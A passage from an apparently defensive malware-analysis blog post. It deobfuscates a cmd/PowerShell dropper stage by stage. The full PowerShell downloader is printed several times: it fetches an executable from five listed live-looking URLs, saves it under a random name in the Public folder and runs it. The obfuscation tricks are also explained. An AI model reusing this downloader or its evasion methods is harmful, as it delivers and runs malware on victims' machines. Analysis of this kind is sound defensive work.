aE1''hua''''s);In''3''Gj'voke-It''''em(''a''E1''''h''ua''s)'';brea''''k'';}cat''ch{w''''r''i''te-host aE1_.Ex''ception's''DB.''Message'''';}}'
)
.REpLacE('Dsp',[''s''trI''ng]').REpLacE((7H5),'\''').REpLacE('aE1','''$s'3G''jDB) ''
)
'
)
-cREpLaCe'mQe',''$ -REplAce  '''\',\ -REplAce 'sDB','
)
| .( $SHEllId[1]''$shElL''id[13]'x')')  -cREplACe  (tiQ,$-REPLacE'3Gj','-REPLacE(PBw),|)
)
)

*** Manually removed all ” (single quote characters) ***
*** Re-removed 3Gj with ‘ (single quote character) ***
*** Re-removed sDB with ‘ (single quote character) ***
*** Re-removed Dsp with ‘ (single quote character) ***

cmd   wmic   &   %comspec%       /v        /c       
set %mTozMmVOmbRzBfT%=EoRfELTbX&&
set %JLUNwakct%=o^w^e^r^s&&set %LGsjYrTcMLwIEKw%=zzzAAsbLA&&
set %fwbPvzwZR%=p&&
set %cjfjGhDSrRlFuop%=uHokpjKAdUfGLTb&&
set %XZGDjkTXd%=^h^e^l^l&&
set %ikvsDsMkWiIfRmY%=qEIKFtDqWTRfBOa&&!%fwbPvzwZR%!!%JLUNwakct%!!%XZGDjkTXd%!  "& ( $ENv:COmSpeC[4,26,25]-Join'')
( 
(

(' 

(
(' & ( ([sTriNG]$verBosePrEFErence)[1,3]'x'-JoiN) 

(
(
'aE1franc = new-object System.Net.WebClient;aE1nsadasd = new-object random;aE1bcd = 'http://www.medicinedistributor.com/UVRJ/,http://www.shopnz.in/fg/,http://cabletvinternet.us/fFQiRYu/,http://www.donghodinhvigps.com/h/,http://ajaxtube.com/tFUIADP/'.Split(','');aE1karapas = aE1nsadasd.next(1, 343245);aE1huas = aE1env:public  '\'  aE1karapas  '.exe';foreach(aE1abc in aE1bcd){try{aE1franc.DownloadFile(aE1abc.ToString(), aE1huas);Invoke-Item(aE1huas);break;}catch{write-host aE1_.Exception.Message;}}'
)
.REpLacE('Dsp',[strIng]').REpLacE((7H5),'\').REpLacE('aE1','$') 
)
'
)
-cREpLaCe'mQe',''$ -REplAce  '''\',\ -REplAce 'sDB','
)
| .( $SHEllId[1]''$shElL''id[13]'x')')  -cREplACe  (tiQ,$-REPLacE'3Gj','-REPLacE(PBw),|)
)
)

*** Removed all instances of aE1 with $ (dollar sign character) ***

cmd   wmic   &   %comspec%       /v        /c       
set %mTozMmVOmbRzBfT%=EoRfELTbX&&
set %JLUNwakct%=o^w^e^r^s&&set %LGsjYrTcMLwIEKw%=zzzAAsbLA&&
set %fwbPvzwZR%=p&&
set %cjfjGhDSrRlFuop%=uHokpjKAdUfGLTb&&
set %XZGDjkTXd%=^h^e^l^l&&
set %ikvsDsMkWiIfRmY%=qEIKFtDqWTRfBOa&&!%fwbPvzwZR%!!%JLUNwakct%!!%XZGDjkTXd%!  "& ( $ENv:COmSpeC[4,26,25]-Join'')
( 
(

(' 

(
(' & ( ([sTriNG]$verBosePrEFErence)[1,3]'x'-JoiN) 

(
(
'$franc = new-object System.Net.WebClient;$nsadasd = new-object random;$bcd = 'http://www.medicinedistributor.com/UVRJ/,http://www.shopnz.in/fg/,http://cabletvinternet.us/fFQiRYu/,http://www.donghodinhvigps.com/h/,http://ajaxtube.com/tFUIADP/'.Split(','');$karapas = $nsadasd.next(1, 343245);$huas = $env:public  '\'  $karapas  '.exe';foreach($abc in $bcd){try{$franc.DownloadFile($abc.ToString(), $huas);Invoke-Item($huas);break;}catch{write-host $_.Exception.Message;}}'
)
.REpLacE('Dsp',[strIng]').REpLacE((7H5),'\').REpLacE('$','$') 
)
'
)
-cREpLaCe'mQe',''$ -REplAce  '''\',\ -REplAce 'sDB','
)
| .( $SHEllId[1]''$shElL''id[13]'x')')  -cREplACe  (tiQ,$-REPLacE'3Gj','-REPLacE(PBw),|)
)
)

Once all the different items were cleaned up from the script, I ended up with the following.

cmd   wmic   &   %comspec%       /v        /c       
set %mTozMmVOmbRzBfT%=EoRfELTbX&&
set %JLUNwakct%=o^w^e^r^s&&set 
%LGsjYrTcMLwIEKw%=zzzAAsbLA&&
set %fwbPvzwZR%=p&&
set %cjfjGhDSrRlFuop%=uHokpjKAdUfGLTb&&
set %XZGDjkTXd%=^h^e^l^l&&
set %ikvsDsMkWiIfRmY%=qEIKFtDqWTRfBOa&&!%fwbPvzwZR%!!%JLUNwakct%!!%XZGDjkTXd%!  "& ( $ENv:COmSpeC[4,26,25]-Join'')
// set %ikvsDsMkWiIfRmY%=powershell" & ( $ENv:COmSpeC[I,E,X]-Join'')

( 
(

(' 

(
(' & ( ([sTriNG]$verBosePrEFErence)[1,3]'x'-JoiN) 

(
(
'$franc = new-object System.Net.WebClient;
$nsadasd = new-object random;
$bcd = 'http://www.medicinedistributor.com/UVRJ/,http://www.shopnz.in/fg/,http://cabletvinternet.us/fFQiRYu/,http://www.donghodinhvigps.com/h/,http://ajaxtube.com/tFUIADP/'.Split(','');
$karapas = $nsadasd.next(1, 343245);
$huas = $env:public  '\'  
$karapas  '.exe';
	foreach($abc in $bcd)
		{try{$franc.DownloadFile($abc.ToString(), $huas);
		Invoke-Item($huas);
		break;}
	catch{write-host $_.Exception.Message;}}'
)
.REpLacE('Dsp',[strIng]').REpLacE((7H5),'\').REpLacE('$','$') 
)
'
)
-cREpLaCe'mQe',''$ -REplAce  '''\',\ -REplAce 'sDB',')
| .( $SHEllId[1]''$shElL''id[13]'x')')  -cREplACe  (tiQ,$-REPLacE'3Gj','-REPLacE(PBw),|)
)
)

As for the script, the ComSpec environment variable along with the “[4,26,25]-Join” pulls the characters from the string “C:\WINDOWS\system32\cmd.exe” (remember to start with 0) and builds IEX which is a way of invoking a command via Powershell (https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-5.1). This is what helps “fetch” the binary from the URLs listed in the script. The URLs listed get loaded into an array in which it tries to download the malicious binary from. The binary gets a random number generated name which gets ‘.exe’ appended to the end and saved in the “PUBLIC” folder.

Leave a Reply

Your email address will not be published. Required fields are marked *